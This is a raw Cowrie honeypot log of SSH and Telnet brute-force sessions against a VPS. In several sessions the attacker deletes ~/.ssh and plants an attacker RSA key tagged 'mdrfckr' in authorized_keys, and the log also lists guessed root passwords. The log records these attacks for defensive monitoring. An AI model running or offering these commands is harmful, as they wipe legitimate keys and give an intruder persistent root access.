{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:31:03.562239Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:31:03.563414Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:03.779682Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:31:04.318739Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:31:04.319407Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:31:04.536534Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:04.537378Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37790,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b9df85ffc59","protocol":"ssh","message":"New connection: 212.227.235.229:37790 (1.2.3.4:22) [session: 7b9df85ffc59]","sensor":"my-vps","timestamp":"2025-08-26T05:31:04.765022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:31:04.765683Z","src_ip":"212.227.235.229","session":"7b9df85ffc59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:31:04.983453Z","src_ip":"212.227.235.229","session":"7b9df85ffc59"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:31:05.896470Z","src_ip":"212.227.235.229","session":"7b9df85ffc59"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:07.117397Z","src_ip":"212.227.235.229","session":"7b9df85ffc59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37796,"dst_ip":"1.2.3.4","dst_port":22,"session":"06a84a7e9dcd","protocol":"ssh","message":"New connection: 212.227.235.229:37796 (1.2.3.4:22) [session: 06a84a7e9dcd]","sensor":"my-vps","timestamp":"2025-08-26T05:31:07.333462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:31:07.334364Z","src_ip":"212.227.235.229","session":"06a84a7e9dcd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:31:07.551593Z","src_ip":"212.227.235.229","session":"06a84a7e9dcd"}
{"eventid":"cowrie.session.connect","src_ip":"59.23.174.213","src_port":51101,"dst_ip":"1.2.3.4","dst_port":23,"session":"6e835dc11399","protocol":"telnet","message":"New connection: 59.23.174.213:51101 (1.2.3.4:23) [session: 6e835dc11399]","sensor":"my-vps","timestamp":"2025-08-26T05:31:07.876907Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:31:08.463357Z","src_ip":"212.227.235.229","session":"06a84a7e9dcd"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:08.676452Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:08.681718Z","src_ip":"212.227.235.229","session":"06a84a7e9dcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49142,"dst_ip":"1.2.3.4","dst_port":22,"session":"eec4a751cce6","protocol":"ssh","message":"New connection: 212.227.235.229:49142 (1.2.3.4:22) [session: eec4a751cce6]","sensor":"my-vps","timestamp":"2025-08-26T05:31:21.047457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:31:21.048461Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:31:21.467051Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.login.success","username":"root","password":"ADMIN123admin","message":"login attempt [root/ADMIN123admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:31:22.464873Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:31:23.000167Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:31:23.000845Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:31:23.001605Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:23.242232Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:31:23.737916Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:31:23.738637Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:31:23.978573Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:23.979707Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32862,"dst_ip":"1.2.3.4","dst_port":22,"session":"5415f2658277","protocol":"ssh","message":"New connection: 212.227.235.229:32862 (1.2.3.4:22) [session: 5415f2658277]","sensor":"my-vps","timestamp":"2025-08-26T05:31:32.754608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:31:32.755696Z","src_ip":"212.227.235.229","session":"5415f2658277"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:31:33.215847Z","src_ip":"212.227.235.229","session":"5415f2658277"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:31:34.219233Z","src_ip":"212.227.235.229","session":"5415f2658277"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:34.461087Z","src_ip":"212.227.235.229","session":"5415f2658277"}
{"eventid":"cowrie.session.closed","duration":"13.6","message":"Connection lost after 13.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:34.633183Z","src_ip":"212.227.235.229","session":"eec4a751cce6"}
{"eventid":"cowrie.session.closed","duration":39.95354390144348,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:47.830373Z","src_ip":"59.23.174.213","session":"6e835dc11399"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56470,"dst_ip":"1.2.3.4","dst_port":22,"session":"132983d2412f","protocol":"ssh","message":"New connection: 217.72.205.35:56470 (1.2.3.4:22) [session: 132983d2412f]","sensor":"my-vps","timestamp":"2025-08-26T05:31:59.334092Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:31:59.335658Z","src_ip":"217.72.205.35","session":"132983d2412f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45834,"dst_ip":"1.2.3.4","dst_port":23,"session":"377af1d5ff9f","protocol":"telnet","message":"New connection: 212.227.125.160:45834 (1.2.3.4:23) [session: 377af1d5ff9f]","sensor":"my-vps","timestamp":"2025-08-26T05:32:03.809417Z"}
{"eventid":"cowrie.session.connect","src_ip":"138.197.23.166","src_port":56428,"dst_ip":"1.2.3.4","dst_port":23,"session":"a7465bcb9e8e","protocol":"telnet","message":"New connection: 138.197.23.166:56428 (1.2.3.4:23) [session: a7465bcb9e8e]","sensor":"my-vps","timestamp":"2025-08-26T05:32:33.654014Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T05:32:33.868964Z","src_ip":"138.197.23.166","session":"a7465bcb9e8e"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T05:32:35.124825Z","src_ip":"138.197.23.166","session":"a7465bcb9e8e"}
{"eventid":"cowrie.session.closed","duration":31.416998147964478,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:32:35.226352Z","src_ip":"212.227.125.160","session":"377af1d5ff9f"}
{"eventid":"cowrie.session.closed","duration":2.6374332904815674,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:32:36.291376Z","src_ip":"138.197.23.166","session":"a7465bcb9e8e"}
{"eventid":"cowrie.session.connect","src_ip":"138.197.23.166","src_port":49022,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdc9668d7afb","protocol":"telnet","message":"New connection: 138.197.23.166:49022 (1.2.3.4:23) [session: fdc9668d7afb]","sensor":"my-vps","timestamp":"2025-08-26T05:32:36.382612Z"}
{"eventid":"cowrie.session.closed","duration":1.555739402770996,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:32:37.938283Z","src_ip":"138.197.23.166","session":"fdc9668d7afb"}
{"eventid":"cowrie.session.connect","src_ip":"138.197.23.166","src_port":49028,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc9947cb269c","protocol":"telnet","message":"New connection: 138.197.23.166:49028 (1.2.3.4:23) [session: dc9947cb269c]","sensor":"my-vps","timestamp":"2025-08-26T05:32:38.028106Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:32:39.696775Z","src_ip":"138.197.23.166","session":"dc9947cb269c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:32:39.771688Z","src_ip":"138.197.23.166","session":"dc9947cb269c"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T05:32:39.895823Z","src_ip":"138.197.23.166","session":"dc9947cb269c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:32:40.973643Z","src_ip":"138.197.23.166","session":"dc9947cb269c"}
{"eventid":"cowrie.session.closed","duration":2.9506373405456543,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:32:40.978685Z","src_ip":"138.197.23.166","session":"dc9947cb269c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45294,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b38f227841f","protocol":"ssh","message":"New connection: 212.227.235.229:45294 (1.2.3.4:22) [session: 8b38f227841f]","sensor":"my-vps","timestamp":"2025-08-26T05:32:57.768640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:32:57.769445Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:32:58.021722Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.login.success","username":"root","password":"Jz@123456","message":"login attempt [root/Jz@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:32:59.070433Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:32:59.595084Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:32:59.595783Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:32:59.596586Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:32:59.849661Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:33:00.454370Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
